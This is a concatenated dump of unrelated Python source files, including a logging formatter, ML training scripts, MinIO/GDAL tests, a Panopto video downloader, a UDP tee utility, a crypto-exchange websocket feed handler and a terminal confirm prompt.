content stringlengths 5 1.05M |
|---|
import logging
import os
class DIDFormatter(logging.Formatter):
"""
Need a customer formatter to allow for logging with request ids that vary.
Normally log messages are "level instance component request_id msg" and
request_id gets set by initialize_logging but we need a handler that'll let
us pass in the request id and have that embedded in the log message
"""
def format(self, record: logging.LogRecord) -> str:
"""
Format record with request id if present, otherwise assume None
:param record: LogRecord
:return: formatted log message
"""
if hasattr(record, "requestId"):
return super().format(record)
else:
setattr(record, "requestId", None)
return super().format(record)
def initialize_root_logger(did_scheme: str):
"""
Get a logger and initialize it so that it outputs the correct format
:param did_scheme: The scheme name to identify his did finder in log messages.
:return: logger with correct formatting that outputs to console
"""
log = logging.getLogger()
instance = os.environ.get('INSTANCE_NAME', 'Unknown')
formatter = DIDFormatter('%(levelname)s ' +
f"{instance} {did_scheme}_did_finder " +
'%(requestId)s %(message)s')
handler = logging.StreamHandler()
handler.setFormatter(formatter)
handler.setLevel(logging.INFO)
log.addHandler(handler)
log.setLevel(logging.INFO)
return log
|
from django.db import models
def build_models(payment_class):
return []
|
import time
import pickle
import numpy as np
from nltk.corpus import stopwords
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import average_precision_score, recall_score, f1_score,\
classification_report
def add_to_array(array: list, word: str, val: str, features, stemmer):
if word in stopwords.words():
return
word = stemmer.stem(word)
if word in features:
array[features.index(word)] += int(val)
def get_unused_dataset_indxs(dataset, bottom_threshold, top_threshold):
summed_dataset = np.sum(dataset, axis=0)
bottom_indxs_delete = summed_dataset <= bottom_threshold
top_indxs_delete = summed_dataset >= top_threshold
cols_to_delete = np.logical_or(bottom_indxs_delete, top_indxs_delete)
return [indx for indx in range(len(cols_to_delete)) if cols_to_delete[indx]]
def get_unused_features(features_importance, threshold=0):
cols_to_delete = features_importance <= threshold
return [indx for indx in range(len(cols_to_delete)) if cols_to_delete[indx]]
def concat_features(features_a, features_b, file):
features_a = set(features_a)
features_a.update(features_b)
features_a = list(features_a)
with open(file, 'wb') as f:
pickle.dump(features_a, f)
def split_to_train_test(features_and_labels: list, test_set_percent=0.4,
shuffle=True, labels=None):
features = features_and_labels
if labels is None:
labels = features_and_labels[:, -1:].ravel()
features = features_and_labels[:, :-1]
else:
labels = labels.ravel()
return train_test_split(features, labels, test_size=test_set_percent,
random_state=42, shuffle=True, stratify=labels)
|
import mysql.connector
conn = mysql.connector.connect(user='root',password='root',database='test',host='127.0.0.1',charset='utf8')
cursor = conn.cursor()
cursor.execute('create table user (id varchar(20) primary key,name varchar(20))')
cursor.execute('insert into user values (%s,%s)',['1','Twittytop'])
print(cursor.rowcount)
conn.commit()
cursor.close()
cursor = conn.cursor()
cursor.execute('select name from user where id = %s',('1',))
values = cursor.fetchall()
print(values)
cursor.close()
conn.close() |
import subprocess
import textwrap
import pytest
import signal
import socket
import time
import os
PORT = 9000
HOST = 'localhost'
KEY = "testtesttest"
@pytest.fixture(scope="session")
def minio():
# Setup
os.environ['MINIO_ACCESS_KEY'] = KEY
os.environ['MINIO_SECRET_KEY'] = KEY
os.environ['MINT_MODE'] = 'full'
os.environ['ACCESS_KEY'] = KEY
os.environ['SECRET_KEY'] = KEY
os.environ['ENABLE_HTTPS'] = "0"
if os.path.exists("minio"):
command = "./minio"
else:
command = "minio"
subprocess.check_call(command)
process = subprocess.Popen(command + " server data", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
# wait for start
not_running = True
while not_running:
try:
s = socket.socket()
s.connect((HOST, PORT))
not_running = False
except Exception as e:
time.sleep(0.5)
finally:
s.close()
yield
# Teardown
os.killpg(process.pid, signal.SIGTERM)
def write_gdalconfig_for_minio(f):
f.write_text(textwrap.dedent(f"""\n
saveobs: /tmp/obs.tif
gdalconfig:
GDAL_DISABLE_READDIR_ON_OPEN: YES
CPL_VSIL_CURL_ALLOWED_EXTENSIONS: '.tif,.geojson'
CPL_VSIL_USE_TEMP_FILE_FOR_RANDOM_WRITE: YES
#CPL_CURL_VERBOSE: YES
CPL_DEBUG: YES
AWS_HTTPS: NO
AWS_VIRTUAL_HOSTING: FALSE
AWS_S3_ENDPOINT: {HOST}:{PORT}
AWS_SECRET_ACCESS_KEY: {KEY}
AWS_ACCESS_KEY_ID: {KEY}
"""))
def test_gdal_with_minio(minio):
from osgeo import gdal
import numpy as np
gdal.UseExceptions()
gdal.SetConfigOption('AWS_HTTPS', 'NO')
gdal.SetConfigOption('GDAL_DISABLE_READDIR_ON_OPEN', 'YES')
gdal.SetConfigOption('AWS_VIRTUAL_HOSTING', 'FALSE')
gdal.SetConfigOption('AWS_S3_ENDPOINT', f'{HOST}:{PORT}')
gdal.SetConfigOption('AWS_SECRET_ACCESS_KEY', KEY)
gdal.SetConfigOption('AWS_ACCESS_KEY_ID', KEY)
path = '/vsis3/test/S2A_OPER_MSI_ARD_TL_VGS1_20210205T055002_A029372_T50HMK_N02.09/NBAR/NBAR_B01.TIF'
ds = gdal.Open(path)
band = ds.GetRasterBand(1)
xoff, yoff, xcount, ycount = (0, 0, 10, 10)
data = band.ReadAsArray(xoff, yoff, xcount, ycount)
assert np.sum(data) > 0
def test_empty_config_s3(minio, tmp_path):
f = tmp_path / "test.yaml"
f.touch()
write_gdalconfig_for_minio(f)
subprocess.check_call(['./nrtpredict.py', '-c', f, 's3://test/S2A_OPER_MSI_ARD_TL_VGS1_20210205T055002_A029372_T50HMK_N02.09'])
#def test_ancillary_on_s3(minio, tmp_path):
# f = tmp_path / "test.yaml"
# g = tmp_path / "clip.geojson"
# f.write_text(textwrap.dedent("""
# clipshpfn: {g}
# models:
# - name: NoOp
# output: nbr.tif
# inputs:
# - filename: s3://test/s2be.tif
# """))
# write_gdalconfig_for_minio(f)
# subprocess.check_call(['./nrtpredict.py', '-c', f, 's3://test/S2A_OPER_MSI_ARD_TL_VGS1_20210205T055002_A029372_T50HMK_N02.09'])
# #assert os.path.exists(g)
|
import os
import requests
import time
import json
import argparse
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import progressbar
import urllib.request
import getpass
progress_bar = None
json_file_path = "network_log.json"
def show_progress(block_num, block_size, total_size):
global progress_bar
if progress_bar is None:
progress_bar = progressbar.ProgressBar(maxval=total_size)
progress_bar.start()
downloaded = block_num * block_size
if downloaded < total_size:
progress_bar.update(downloaded)
else:
progress_bar.finish()
progress_bar = None
def resource_path(relative_path):
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.dirname(__file__)
return os.path.join(base_path, relative_path)
if __name__ == "__main__":
print(
"""\n
Please do not close the main browser window if you want to be able to keep downloading videos.
\n""")
desired_capabilities = DesiredCapabilities.CHROME
desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument("--ignore-certificate-errors")
# parser = argparse.ArgumentParser(description='Downloads selected videos from panopto.')
# parser.add_argument('-headless', action="store_false", help='If specified opens up with browser')
# args = parser.parse_args()
driver = webdriver.Chrome(resource_path('./driver/chromedriver.exe'), options=options, desired_capabilities=desired_capabilities)
driver.get("http://login.panopto.com/")
while True:
check = input("Please type 'yes' if you have logged in to panopto: ")
if check.lower() == 'yes':
break
while True:
mainUrl = input("Please input the video URL: ")
if mainUrl.replace(" ", "") == "":
print('\n')
continue
driver.get(mainUrl)
print("\n Initializing... \n\n")
time.sleep(3)
if not len(driver.find_elements(By.ID, "PageContentPlaceholder_loginControl_externalLoginButton")) == 0:
print("logging in to panopto \n")
driver.find_element(By.ID, "PageContentPlaceholder_loginControl_externalLoginButton").click()
time.sleep(.5)
driver.get(mainUrl)
time.sleep(3)
logs = driver.get_log("performance")
with open(json_file_path, "w", encoding="utf-8") as f:
f.write("[")
for log in logs:
network_log = json.loads(log["message"])["message"]
if("Network.response" in network_log["method"]
or "Network.request" in network_log["method"]
or "Network.webSocket" in network_log["method"]):
f.write(json.dumps(network_log)+",")
f.write("{}]")
with open(json_file_path, "r", encoding="utf-8") as f:
logs = json.loads(f.read())
url_found = False
mp4 = False
mp4s = []
for log in logs:
try:
url = log["params"]["request"]["url"]
if url[len(url)-3:] == ".ts":
url_found = True
print(f'Media file found in URL: \n {url}', end='\n\n')
break
elif log["params"]["type"] == "Media" and ".mp4" in url:
url_found = True
mp4 = True
mp4s.append(url)
except Exception as e:
pass
if url_found:
if not mp4:
fileName = input('Output name (Do not put any extension): ')
while os.path.exists(f'{fileName}.ts'):
print("\n File already exists please enter a new name")
fileName = input('Output name: ')
i = 0
while True:
number = '00' + '0' * (3-len(str(i))) + str(i)
url = url[ : -8]
url = f'{url}{number}.ts'
r=requests.get(url)
if r.content.startswith(b'<?xml version="1.0" encoding="UTF-8"?>\n<Error>') or r.content == b'':
print("\n\n")
break
print(f'Video index: "{number}"')
print(url, end= "\n")
open(f'{fileName}.ts', 'ab').write(r.content)
i+=1
else:
print(
f"""\n\n This is a single mp4 file download, it may not perfectly work.
If it didn't download the right video please send me a message together with the url of video you are trying to download and with this url:
{url} \n\n""")
fileName = input('Output name (Do not put any extension): ')
while os.path.exists(f'{fileName}.mp4'):
print("\n File already exists please enter a new name")
fileName = input('Output name: ')
print("Please wait...")
r=requests.get(url)
urllib.request.urlretrieve(url, f"{fileName}.mp4", show_progress)
print(
f"""If it didn't download the right video you can also manually find and download the video you want, from here:
{mp4s} \n""")
else:
print("media file couldn't be found.", end="\n\n")
if os.path.exists("network_log.json"):
os.remove("network_log.json")
else:
print("json file doesn't exist")
driver.quit() |
import torch
from jaclearn.logic.propositional.logic_induction import search
from tqdm import tqdm
def get_logic_formula(inputs, outputs, in_names, f):
"""
Return searched logic formula
inputs, outputs are torch tensors
in_names are the names for input
f[k] is the set of considered variables for the k-th output
"""
inputs = inputs.view(-1, inputs.size(-1))
outputs = outputs.view(-1, outputs.size(-1))
assert inputs.size(-1) == len(in_names)
assert outputs.size(-1) == len(f)
formula = []
progress_bar = tqdm(range(outputs.size(-1)))
progress_bar.set_description('Computing logic formulas')
for k in progress_bar:
fs = list(sorted(list(f[k])))
if len(fs) == 0:
vmin = int(outputs.type(torch.int).min().item())
vmax = int(outputs.type(torch.int).max().item())
assert vmax == vmin
formula.append('True' if vmax > .5 else 'False')
else:
logic_inputs = inputs[:, torch.LongTensor(fs)].type(torch.uint8).numpy().astype('uint8')
logic_in_names = [in_names[fid] for fid in fs]
logic_outputs = outputs[:, k:k + 1].type(torch.uint8).numpy().astype('uint8')
check_logic_data(logic_inputs, logic_outputs, logic_in_names)
formula.append(str(search(logic_inputs, logic_outputs, logic_in_names)))
return formula
def check_logic_data(inputs, outputs, names):
n = len(names)
B = inputs.shape[0]
assert inputs.shape == (B, n)
assert outputs.shape == (B, 1)
ans = {}
for i in range(B):
in_str = ''
for k in range(n):
if int(inputs[i, k]) == 1:
in_str += '1'
elif int(inputs[i, k]) == 0:
in_str += '0'
else:
raise ValueError()
if int(outputs[i, 0]) == 1:
out_str = '1'
elif int(outputs[i, 0]) == 0:
out_str = '0'
else:
raise ValueError()
if in_str in ans:
if ans[in_str] != out_str:
print("Different output for same input")
raise ValueError()
ans[in_str] = out_str
print(ans)
|
while (True):
print ('Press Q to quit')
a = input('Enter a Number: ')
if (a == 'q'):
break
try:
print ('Trying...')
a = int(a)
if (a > 6):
print ('You Enter a number greater than 6')
except Exception as e:
print (f'Your input resulted in an error! {e}')
print ('Thank You for playing this game') |
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
plt.style.use('ggplot')
import torch
print(torch.__version__)
import torch.nn as nn # содержит функции для реалзации архитектуры нейронных сетей
import torch.optim as optim
import torch.utils.data as data_utils
from torch.utils.tensorboard import SummaryWriter
from pytorch_lightning.metrics import Accuracy
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
INPUT_SIZE = 37
HIDDEN_SIZE = 25
OUTPUT_SIZE = 4
LEARNING_RATE = 1e-2
EPOCHS = 400
BATCH_SIZE = 256
train_writer = SummaryWriter('./logs/train')
valid_writer = SummaryWriter('./logs/valid')
def load_dataset():
X = pd.read_csv('./data/X_cat.csv', sep='\t', index_col=0)
target = pd.read_csv('./data/y_cat.csv', sep='\t', index_col=0, names=['status']) # header=-1,
print(X.shape)
print(X.head())
target = target.iloc[:, :].values
target[target == 'Died'] = 'Euthanasia'
le = LabelEncoder()
y = le.fit_transform(target)
return X, y
def create_data_loader(X, y):
X_train, X_test, y_train, y_test = train_test_split(X.values, y,
test_size=0.2, stratify=y, random_state=42)
scaler = StandardScaler()
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
train_tensor = data_utils.TensorDataset(torch.tensor(X_train.astype(np.float32)), torch.tensor(y_train))
train_loader = data_utils.DataLoader(dataset=train_tensor,
batch_size=BATCH_SIZE,
shuffle=True)
test_tensor = data_utils.TensorDataset(torch.tensor(X_test.astype(np.float32)), torch.tensor(y_test))
test_loader = data_utils.DataLoader(dataset=test_tensor,
batch_size=BATCH_SIZE,
shuffle=False)
return X_train, X_test, y_train, y_test, train_loader, test_loader
class MLPNet(nn.Module):
def __init__(self, input_size, hidden_size, output_size):
super(MLPNet, self).__init__()
self.linear1 = torch.nn.Linear(input_size, hidden_size)
self.linear2 = torch.nn.Linear(hidden_size, hidden_size)
self.linear3 = torch.nn.Linear(hidden_size, output_size)
def forward(self, x):
output = self.linear1(x)
output = torch.relu(output)
output = self.linear2(output)
output = torch.relu(output)
output = self.linear3(output)
predictions = torch.softmax(output, dim=1)
return predictions
def run_train(model):
step = 0
for epoch in range(EPOCHS):
model.train()
for features, label in train_loader:
# Reset gradients
optimizer.zero_grad()
output = model(features)
# Calculate error and backpropagate
loss = criterion(output, label)
loss.backward()
acc = accuracy(output, label).item()
# Update weights with gradients
optimizer.step()
train_writer.add_scalar('CrossEntropyLoss', loss, step)
train_writer.add_scalar('Accuracy', acc, step)
step += 1
if step % 50 == 0:
print('EPOCH %d STEP %d : train_loss: %f train_acc: %f' %
(epoch, step, loss, acc))
train_writer.add_histogram('hidden_layer', model.linear1.weight.data, step)
# Run validation
running_loss = []
valid_scores = []
valid_labels = []
model.eval()
with torch.no_grad():
for features, label in test_loader:
output = model(features)
# Calculate error and backpropagate
loss = criterion(output, label)
running_loss.append(loss.item())
valid_scores.extend(torch.argmax(output, dim=1))
valid_labels.extend(label)
valid_accuracy = accuracy(torch.tensor(valid_scores), torch.tensor(valid_labels)).item()
valid_writer.add_scalar('CrossEntropyLoss', np.mean(running_loss), step)
valid_writer.add_scalar('Accuracy', valid_accuracy, step)
print('EPOCH %d : valid_loss: %f valid_acc: %f' % (epoch, np.mean(running_loss), valid_accuracy))
return
features, labels = load_dataset()
X_train, X_test, y_train, y_test, train_loader, test_loader = create_data_loader(features, labels)
model = MLPNet(INPUT_SIZE, HIDDEN_SIZE, OUTPUT_SIZE)
criterion = nn.CrossEntropyLoss()
accuracy = Accuracy()
optimizer = optim.SGD(model.parameters(), lr=LEARNING_RATE)
train_writer.add_text('LEARNING_RATE', str(LEARNING_RATE))
train_writer.add_text('INPUT_SIZE', str(INPUT_SIZE))
train_writer.add_text('HIDDEN_SIZE', str(HIDDEN_SIZE))
train_writer.add_text('NROF_CLASSES', str(OUTPUT_SIZE))
train_writer.add_text('BATCH_SIZE', str(BATCH_SIZE))
train_writer.add_graph(model, torch.tensor(X_test.astype(np.float32)), verbose=True)
run_train(model) |
import random
import arcade
class Cactus(arcade.Sprite):
def __init__(self, width, height, speed):
super().__init__()
self.pic_path = random.choice(['images/cactus1_night.png','images/cactus4_night.png'])
self.texture = arcade.load_texture(self.pic_path)
self.center_x = width
self.center_y = 164
self.change_x = speed #-4
self.change_y = 0
self.width = 100
self.height = 100 |
#!/usr/bin/python
import sys,os,re,optparse,tarfile,uuid,math,glob
from arguments_RAxML import *
def TF(inputTF):
if( inputTF != None and inputTF!=False ): return "True"
return "False"
'''
Builds the submit file for RAxML runs
'''
def main():
current_version = "#version 1.0.1" #1.0.1 added code for RAxML flag -#
current_RAxML_version = "raxmlHPC"
instanceID = uuid.uuid4()
parser = getParser()
options, remainder = parser.parse_args()
noErrors = 1
print("\n")
#__________________________
#fetch the working directory
#__________________________
try:
working_dir = os.path.dirname(os.path.realpath(__file__))
except:
print("ERROR: problem determining working directory")
noErrors = 0
#__________________________
# Work on data directory
#__________________________
data_dir = remainder[0]
if( data_dir == None ):
print("ERROR: no data directory provided. First argument after set_up_RAxML should be data directory")
noErrors = 0
else:
if os.path.isdir(data_dir) != True :
print("ERROR: data directory (" + data_dir + ") does not exist.")
noErrors = 0
if noErrors == 1:
myGenes = []
myFiletypes = []
filetypes = ('*.phy', '*.phylip', '*.nex') # the tuple of file types
for filetype in filetypes:
for file in glob.glob(data_dir + "/" + filetype):
if filetype == "*.nex" :
phyFilename1 = os.path.splitext(os.path.basename(file))[0] + ".phy"
phyFilename2 = os.path.splitext(os.path.basename(file))[0] + ".phylip"
if (os.path.isfile(data_dir + "/" + phyFilename1) or os.path.isfile(data_dir + "/" + phyFilename2)):
print("ERROR: phylip file already exists for a nexus file("+file+"). Data would be overwritten when nexus file created.")
noErrors = 0
myGenes.append(os.path.basename(file))
myFiletypes.append(filetype)
if len(myGenes) == 0 :
print "ERROR: no phylip (*.phy) or nexus (*.nex) files found in data directory."
noErrors = 0
else:
print "CHECKED: Found ", len(myGenes), "phylip files in directory:", working_dir+"/" + data_dir+"/."
#__________________________
# Work on LOG/ERR/OUT directories
#__________________________
if( os.path.isdir("log") ):
print "CHECKED: - log/ directory exists."
else:
os.makedirs("log")
print "ACTION: - log/ directory created."
if( os.path.isdir("err") ):
print "CHECKED: - err/ directory exists."
else:
os.makedirs("err")
print "ACTION: - err/ directory created."
if( os.path.isdir("out") ):
print "CHECKED: - out/ directory exists."
else:
os.makedirs("out")
print "ACTION: - out/ directory created."
#If any errors prior to this point, stop
if noErrors == 0 : sys.exit()
#Build run_RAxML.dag which lists the individual genes to run
st = "#instanceID="+str(instanceID)+"\n"
st += "#This dag runs the individual genes through RAxML\n\n"
whichGene = 0
for file in myGenes:
whichGene += 1
basename = os.path.splitext(file)[0]
st += 'JOB run_RAxML_' + str(whichGene) + ' run_RAxML.submit\n'
st += 'VARS run_RAxML_' + str(whichGene) + ' filename="' + file + '" basename = "' + basename + '"\n'
st += 'SCRIPT POST run_RAxML_' + str(whichGene) + ' pos_RAxML.py $RETURN ' + basename+ '\n\n'
submit_file = open('run_RAxML.dag', 'w')
submit_file.write(st)
submit_file.close()
#_________________________
#Build run_RAxML.submit
#- This job file submits each individual gene
#_________________________
st = "#instanceID="+str(instanceID)+"\n"
st += "#Submit file for RAxML.\n\n"
st += "universe = Vanilla\n\n"
st += "executable = run_RAxML.py\n\n"
st += "DDIR = " + working_dir + "/" + data_dir + "\n"
st += "should_transfer_files = YES\n"
st += "when_to_transfer_output = ON_EXIT\n\n"
st += "transfer_input_files = run_RAxML.py, nexusToPhylip.py, raxmlHPC, $(DDIR)/$(filename)\n\n"
st += "log = log/raxml.$(basename).log\n"
st += "error = err/raxml.$(basename).err\n"
st += "output = out/raxml.$(basename).out\n\n"
st += "request_cpus = 1\n"
st += "request_disk = 5000\n"
st += "request_memory = 1000\n\n"
#st += "+wantFlocking = true\n"
#st += "+wantGlidein = true\n\n"
st += 'arguments = "' + buildArgList("R", options) + " "
st += '-s $(filename) -n $(basename)"\n'
st += "queue \n\n"
submit_file = open('run_RAxML.submit', 'w')
submit_file.write(st)
submit_file.close()
print "\n\nProgram set_up finished successfully."
print "run_RAxML.dag has been created.\n\n"
main()
|
from enum import Enum
class AntType(Enum):
Explorer = 0
Worker = 1
class MarkType(Enum):
Explored = 0
FoodFound = 1
class TargetType(Enum):
Explore = 0
Home = 1
Food = 2
|
from soniox.transcribe_file import transcribe_file_stream
from soniox.speech_service import Client, set_api_key
from soniox.test_data import TEST_AUDIO_LONG_FLAC
set_api_key("<YOUR-API-KEY>")
def main():
with Client() as client:
for result in transcribe_file_stream(TEST_AUDIO_LONG_FLAC, client):
print(" ".join(w.text for w in result.words))
if __name__ == "__main__":
main() |
# Single source of truth for package version
__version__ = "0.3.8"
|
#!/usr/bin/env python3
'''
udptee.py - like `tee` but duplicates output to a udp destination instead of a
file
'''
import argparse
import sys
import os
import socket
def main(argv=['udptee.py']):
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]), description=(
'like `tee` but duplicates output to a udp destination '
'instead of a file'))
arg_parser.add_argument(
metavar='ADDRESS', dest='addresses', nargs='+', help=(
'destination address "host:port"'))
args = arg_parser.parse_args(args=argv[1:])
addrs = []
for address in args.addresses:
host, port = address.split(':')
port = int(port)
addrs.append((host, port))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
stdin = open(0, mode='rb', buffering=0)
stdout = open(1, mode='wb', buffering=0)
while True:
line = stdin.readline()
if not line:
break
stdout.write(line)
for addr in addrs:
# 1400 byte chunks to avoid EMSGSIZE
for chunk in (line[i*1400:(i+1)*1400]
for i in range((len(line) - 1) // 1400 + 1)):
sock.sendto(chunk, addr)
if __name__ == '__main__':
main(sys.argv)
|
'''
Copyright (C) 2017-2020 Bryant Moscon - bmoscon@gmail.com
Please see the LICENSE file for the terms and conditions
associated with this software.
'''
import json
import logging
from decimal import Decimal
from itertools import product
from sortedcontainers import SortedDict as sd
from cryptofeed.defines import BID, ASK, BLOCKCHAIN, BUY, L2_BOOK, L3_BOOK, SELL, TICKER, TRADES
from cryptofeed.feed import Feed
from cryptofeed.standards import pair_exchange_to_std, timestamp_normalize
LOG = logging.getLogger('feedhandler')
class Blockchain(Feed):
id = BLOCKCHAIN
def __init__(self, pairs=None, channels=None, callbacks=None, **kwargs):
super().__init__("wss://ws.prod.blockchain.info/mercury-gateway/v1/ws",
pairs=pairs, channels=channels, callbacks=callbacks,
origin="https://exchange.blockchain.com",
**kwargs)
self.__reset()
def __reset(self):
self.seq_no = None
self.l2_book = {}
self.l3_book = {}
async def _pair_l2_update(self, msg: str, timestamp: float):
delta = {BID: [], ASK: []}
pair = pair_exchange_to_std(msg['symbol'])
forced = False
if msg['event'] == 'snapshot':
# Reset the book
self.l2_book[pair] = {BID: sd(), ASK: sd()}
forced = True
book = self.l2_book[pair]
for side in (BID, ASK):
for update in msg[side + 's']:
price = update['px']
qty = update['qty']
book[side][price] = qty
if qty <= 0:
del book[side][price]
delta[side].append((price, qty))
self.l2_book[pair] = book
await self.book_callback(self.l2_book[pair], L2_BOOK, pair,
forced, delta, timestamp_normalize(self.id, timestamp), timestamp)
async def _handle_l2_msg(self, msg: str, timestamp: float):
"""
Subscribed message
{
"seqnum": 1,
"event": "subscribed",
"channel": "l2",
"symbol": "BTC-USD"
}
"""
if msg['event'] == 'subscribed':
LOG.info(f"Subscribed to {msg['symbol']}")
elif msg['event'] in ['snapshot', 'updated']:
await self._pair_l2_update(msg, timestamp)
else:
LOG.warning("%s: Unexpected message %s", self.id, msg)
async def _pair_l3_update(self, msg: str, timestamp: float):
delta = {BID: [], ASK: []}
pair = pair_exchange_to_std(msg['symbol'])
if msg['event'] == 'snapshot':
# Reset the book
self.l3_book[pair] = {BID: sd(), ASK: sd()}
book = self.l3_book[pair]
for side in (BID, ASK):
for update in msg[side + 's']:
price = update['px']
qty = update['qty']
order_id = update['id']
p_orders = book[side].get(price, sd())
p_orders[order_id] = qty
if qty <= 0:
del p_orders[order_id]
book[side][price] = p_orders
if len(book[side][price]) == 0:
del book[side][price]
delta[side].append((order_id, price, qty))
self.l3_book[pair] = book
await self.book_callback(self.l3_book[pair], L3_BOOK, pair,
False, delta, timestamp_normalize(self.id, timestamp), timestamp)
async def _handle_l3_msg(self, msg: str, timestamp: float):
if msg['event'] == 'subscribed':
LOG.info(f"Subscribed to {msg['symbol']}")
elif msg['event'] in ['snapshot', 'updated']:
await self._pair_l3_update(msg, timestamp)
else:
LOG.warning("%s: Unexpected message %s", self.id, msg)
async def _trade(self, msg: dict, timestamp: float):
"""
trade msg example
{
"seqnum": 21,
"event": "updated",
"channel": "trades",
"symbol": "BTC-USD",
"timestamp": "2019-08-13T11:30:06.100140Z",
"side": "sell",
"qty": 8.5E-5,
"price": 11252.4,
"trade_id": "12884909920"
}
"""
await self.callback(TRADES, feed=self.id,
pair=msg['symbol'],
side=BUY if msg['side'] == 'buy' else SELL,
amount=msg['qty'],
price=msg['price'],
order_id=msg['trade_id'],
timestamp=timestamp_normalize(self.id, msg['timestamp']),
receipt_timestamp=timestamp)
async def _handle_trade_msg(self, msg: str, timestamp: float):
if msg['event'] == 'subscribed':
LOG.info(f"Subscribed to trades for: {msg['symbol']}")
elif msg['event'] == 'updated':
await self._trade(msg, timestamp)
else:
LOG.warning("%s: Invalid message type %s", self.id, msg)
async def message_handler(self, msg: str, timestamp: float):
msg = json.loads(msg, parse_float=Decimal)
if self.seq_no is not None and msg['seqnum'] != self.seq_no + 1:
raise ValueError("Incorrect sequence number. TODO: implement ws restart")
self.seq_no = msg['seqnum']
if 'channel' in msg:
if msg['channel'] == 'l2':
await self._handle_l2_msg(msg, timestamp)
elif msg['channel'] == 'l3':
await self._handle_l3_msg(msg, timestamp)
elif msg['channel'] == 'trades':
await self._handle_trade_msg(msg, timestamp)
else:
LOG.warning("%s: Invalid message type %s", self.id, msg)
async def subscribe(self, websocket):
self.__reset()
if self.config:
for channel in self.config:
for pair in self.config[channel]:
await websocket.send(json.dumps({"action": "subscribe",
"symbol": pair,
"channel": channel
}))
else:
for pair, channel in product(self.pairs, self.channels):
await websocket.send(json.dumps({"action": "subscribe",
"symbol": pair,
"channel": channel
}))
|
from xicam.plugins import QWidgetPlugin
from pyqtgraph import ImageView, PlotItem
from xicam.core.data import NonDBHeader
from qtpy.QtWidgets import *
from qtpy.QtCore import *
from qtpy.QtGui import *
import numpy as np
from xicam.core import msg
from xicam.gui.widgets.tabview import TabView
from .SAXSViewerPlugin import SAXSViewerPluginBase
class SAXSMultiViewerPlugin(QSplitter, QWidgetPlugin):
def __init__(self, headermodel, selectionmodel):
super(SAXSMultiViewerPlugin, self).__init__()
self.leftTabView = TabView()
self.leftTabView.setWidgetClass(SAXSViewerPluginBase)
self.leftTabView.setHeaderModel(headermodel)
self.leftTabView.setSelectionModel(selectionmodel)
self.rightTabView = TabView()
self.rightTabView.setWidgetClass(SAXSViewerPluginBase)
self.rightTabView.setHeaderModel(headermodel)
self.addWidget(self.leftTabView)
self.addWidget(self.rightTabView)
def __getattr__(self, attr): ## implicitly wrap methods from leftViewer
if hasattr(self.plotwidget, attr):
m = getattr(self.leftViewer, attr)
if hasattr(m, '__call__'):
return m
raise NameError(attr)
|
from typing import Optional
from prompt_toolkit.styles import Style
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.layout import Layout
from prompt_toolkit.lexers import SimpleLexer
from prompt_toolkit.application import get_app
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.validation import Validator
from prompt_toolkit.layout.controls import BufferControl
from prompt_toolkit.formatted_text import AnyFormattedText
from prompt_toolkit.layout.containers import HSplit, Window
from prompt_toolkit.key_binding import KeyBindings, KeyPressEvent
from . import NoAnswer, BasePrompt
class ConfirmPrompt(BasePrompt[bool]):
"""Simple Confirm Prompt.
Style class guide:
```
[?] Choose a choice and return? (Y/n)
└┬┘ └──────────────┬──────────┘ └─┬─┘
questionmark question annotation
```
"""
def __init__(
self,
question: str,
question_mark: str = "[?]",
default_choice: Optional[bool] = None,
):
self.question: str = question
self.question_mark: str = question_mark
self.default_choice: Optional[bool] = default_choice
def _reset(self):
self._answered: bool = False
self._buffer: Buffer = Buffer(
validator=Validator.from_callable(self._validate),
name=DEFAULT_BUFFER,
accept_handler=self._submit,
)
def _build_layout(self) -> Layout:
self._reset()
layout = Layout(
HSplit(
[
Window(
BufferControl(
self._buffer, lexer=SimpleLexer("class:answer")
),
dont_extend_height=True,
get_line_prefix=self._get_prompt,
)
]
)
)
return layout
def _build_style(self, style: Style) -> Style:
default = Style(
[
("questionmark", "fg:#5F819D"),
("question", "bold"),
("answer", "fg:#5F819D"),
]
)
return Style([*default.style_rules, *style.style_rules])
def _build_keybindings(self) -> KeyBindings:
kb = KeyBindings()
@kb.add("enter", eager=True)
def enter(event: KeyPressEvent):
self._buffer.validate_and_handle()
@kb.add("c-c", eager=True)
@kb.add("c-q", eager=True)
def quit(event: KeyPressEvent):
event.app.exit(result=NoAnswer)
return kb
def _get_prompt(
self, line_number: int, wrap_count: int
) -> AnyFormattedText:
prompt = [
("class:questionmark", self.question_mark),
("", " "),
("class:question", self.question.strip()),
("", " "),
]
if not self._answered:
if self.default_choice:
prompt.append(("class:annotation", "(Y/n)"))
elif self.default_choice == False:
prompt.append(("class:annotation", "(y/N)"))
else:
prompt.append(("class:annotation", "(y/n)"))
prompt.append(("", " "))
return prompt
def _validate(self, input: str) -> bool:
if not input and self.default_choice is None:
return False
elif input and input.lower() not in ["y", "yes", "n", "no"]:
return False
return True
def _submit(self, buffer: Buffer) -> bool:
self._answered = True
input = buffer.document.text
if not input:
buffer.document.insert_after(str(self.default_choice))
get_app().exit(result=self.default_choice)
elif input.lower() in ["y", "yes"]:
get_app().exit(result=True)
else:
get_app().exit(result=False)
return True
|
var1 = "2"
print(type(var1)) # <class 'str'>
var1 = 3
print(type(var1)) # <class 'int'>
##################
var1 = 1
var2 = 2.0
var3 = 3.4 + 3j
##################
var4 = "Jamiryo" #--
var5 = [1,1.0,"Jamiryo"] #--
var6 = (1,1.0,"Jamiryo")
##################
var7 = {"1":"Bir","2":"İki"}
##################
var8 = set()
